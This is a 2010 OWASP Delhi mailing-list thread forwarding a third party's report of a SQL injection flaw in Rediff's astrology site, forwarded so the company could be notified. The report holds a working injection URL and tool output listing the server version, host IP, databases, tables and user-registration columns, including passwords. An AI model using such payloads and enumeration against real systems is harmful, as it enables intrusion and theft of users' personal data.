[Owasp-delhi] Rediff Astrology

Lakshmanan, Sriram sriram_lakshmanan at uhc.com
Tue Jun 15 01:38:39 EDT 2010


I've notified a senior person in Rediff who inturn will engage with the
Tech team. If there is someone in Mumbai OWASP who can help explain and
talk to the team there, I can patch the person on. Thanks
 

warm regards,

Sriram

SEC_R_TY. U & I are in it together. Everyone's responsible - Everywhere

 

________________________________

From: owasp-delhi-bounces at lists.owasp.org
[mailto:owasp-delhi-bounces at lists.owasp.org] On Behalf Of Soi, Dhruv
Sent: Monday, June 14, 2010 11:17 PM
To: owasp-delhi at lists.owasp.org; owasp-bangalore at lists.owasp.org;
owasp-mumbai at lists.owasp.org
Subject: [Owasp-delhi] Rediff Astrology



Another one to notify Rediff that readers' daily fortune can be fixed by
someone...Seems Rediff needs a lot of OWASP, do inform them that its
free!!

 

From: "Jack H4xor" 
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology

 

y0,


h0rr1bl3 th4n h0rr0r

Vulnerable Url : 

http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac
=Scorpiox%27%20OR%201=convert%28int,@@version%29--

 

********************************************************************

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++






+     -==  MSSQL Information Schema astrology.rediff.com  ==-     +






++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++






[ + ] URL :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo




diac=Scorpiox'





[ + ] Date: Tue May 18 20:58:26 2010

[ + ] Displaying information about MSSQL host !



[ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel
X86)




                        Aug  6 2000 00:57:48

                        Copyright (c) 1988-2000 Microsoft Corporation

                        Standard Edition on Windows NT 5.0 (Build 2195:
Service

Pack 4)



[ + ] USER ()          : dbo




[ + ] S_USER ()        : astrology

[ + ] DB_NAME ()       : astro

[ + ] HOST_NAME ()     : ASTROLOGY

[ + ] SERVER_NAME ()   : SEARCHDB

[ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0

[ + ] X-POWERED-By ()  : ASP.NET




[ + ] IP_ADDRESS_INFO  : 202.54.124.173





[ - ] We Can't get number of Databases !






[ ! ] Start dumping database Names !




[ ? ] But first choice number of DB to dump :> 20






[ + ] Displaying list of 20 databases on this MSSQL host !






[ DATABASE: 0 ]        : astro




[ DATABASE: 1 ]        : master




[ DATABASE: 2 ]        : tempdb




[ DATABASE: 3 ]        : model




[ DATABASE: 4 ]        : msdb




[ DATABASE: 5 ]        : pubs




[ DATABASE: 6 ]        : Northwind




[ DATABASE: 7 ]        : travel




[ DATABASE: 8 ]        : travel_int




[ DATABASE: 9 ]        : astro




[ DATABASE: 10 ]        : Jobsearch




[ DATABASE: 11 ]        : astroyogiD




[ DATABASE: 12 ]        : matrimonial




[ DATABASE: 13 ]        : investornew




[ DATABASE: 14 ]        : test






[ ! ] Vulnerability Database is   :  astro






[ + ] Displaying Tables inside DB :> astro






[ ? ] Numbers of Tables To Dispaly ?




[ + ] Specify Numbers   :> 200






[ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION




[ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER




[ TABLES: 2 ]          : astrolove




[ TABLES: 3 ]          : astroparent




[ TABLES: 4 ]          : CITY




[ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL




[ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL




[ TABLES: 7 ]          : COUNTRY




[ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS




[ TABLES: 9 ]          : CUSTOMER_CARE_MASTER




[ TABLES: 10 ]          : CUSTOMER_PERSON1




[ TABLES: 11 ]          : CUSTOMER_PERSON2




[ TABLES: 12 ]          : CUSTOMER_PERSON3




[ TABLES: 13 ]          : darshtest




[ TABLES: 14 ]          : dtproperties




[ TABLES: 15 ]          : FENGSHUI




[ TABLES: 16 ]          : FRANCHISEE_MASTER




[ TABLES: 17 ]          : idealmate




[ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER




[ TABLES: 19 ]          : NUMEROLOGY




[ TABLES: 20 ]          : ORDER_DETAILS




[ TABLES: 21 ]          : ORDER_MASTER




[ TABLES: 22 ]          : ORDER_REMARKS




[ TABLES: 23 ]          : ORDERS




[ TABLES: 24 ]          : p1




[ TABLES: 25 ]          : p3master




[ TABLES: 26 ]          : PALMISTRY




[ TABLES: 27 ]          : PAYMENT_METHOD_MASTER




[ TABLES: 28 ]          : PROBLEM_ANSWER




[ TABLES: 29 ]          : PROBLEM_CATEGORY




[ TABLES: 30 ]          : REGISTRATION




[ TABLES: 31 ]          : SHIPPING_DETAILS




[ TABLES: 32 ]          : SPCFIC_ANLYS




[ TABLES: 33 ]          : SUBSCRIBER_DETAILS




[ TABLES: 34 ]          : SUBSCRIBER_MASTER




[ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION




[ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION




[ TABLES: 37 ]          : SUBSCRIPTION_DETAILS




[ TABLES: 38 ]          : SUBSCRIPTION_MASTER




[ TABLES: 39 ]          : sysconstraints




[ TABLES: 40 ]          : syssegments




[ TABLES: 41 ]          : test




[ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION




[ TABLES: 43 ]          : zodiac






[ + ] Done !






[ + ] Start dumping all Columns from table :> REGISTRATION






[ ? ] Numbers of Columns To Display ?




[ + ] Specify Numbers    :> 50






[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database:
astro






[ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID




[ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID




[ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS




[ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY




[ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE




[ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE




[ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR




[ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES




[ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO




[ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY




[ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE




[ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID




[ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME




[ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER




[ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID




[ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP




[ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME




[ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD




[ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO




[ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME






[ ! ] Done !






[ ! ] All information was recorded in astrology.rediff.com.txt file !






[ 1 ] : Return to Tables  !




[ 2 ] : Return to Columns !






[ ? ] : Oprion :>








Thanks & Regards

Jackh4xor

( h4cky0u )

This e-mail, including attachments, may include confidential and/or
proprietary information, and may be used only by the person or entity
to which it is addressed. If the reader of this e-mail is not the intended
recipient or his or her authorized agent, the reader is hereby notified
that any dissemination, distribution or copying of this e-mail is
prohibited. If you have received this e-mail in error, please notify the
sender by replying to this message and delete this e-mail immediately.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100615/1a02da67/attachment-0001.html 


More information about the Owasp-delhi mailing list